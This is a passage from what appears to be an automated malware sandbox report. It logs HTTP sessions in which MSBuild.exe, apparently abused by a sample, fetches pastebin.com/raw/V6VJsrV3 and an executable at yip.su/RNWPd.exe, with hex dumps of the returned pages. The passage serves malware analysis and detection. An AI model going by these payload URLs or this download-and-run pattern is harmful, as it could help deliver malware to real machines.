                    2024-09-16 19:23:29 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:29 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:29 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:29 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:29 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.649788188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:29 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:30 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:29 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:29 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sE1tYIH0I5k1m5aqcjQcBUryL%2FKjoC9OYA29N84SuIein65Jz3RJHfy2Y7ufJz5yscN8j8qd83d2qn7Wbnh2%2BvlGhX2rlPs3Zrm6PxdvsxrIhGcyjmvb4c%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433b37cac44309-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:30 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:30 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                    2024-09-16 19:23:30 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:23:30 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:23:30 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:23:30 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:23:30 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.649789104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:34 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:35 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433b57bf017ca8-EWR
                    2024-09-16 19:23:35 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:35 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:35 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:35 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.649790188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:35 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:35 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:35 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:35 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vC64GAHq9o8l0bmgH7bbCvNtJ1hYfYmpQsdtHvZcVr1oC2sYvmtjnKUErZLp9mMrt%2BUEi%2FCTGX%2FuHaAepPUdWTftvBPNXGl5iVWjjoKzmcBIb2dasNuGhPo%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433b5bcf887d00-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:35 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:35 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:23:35 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
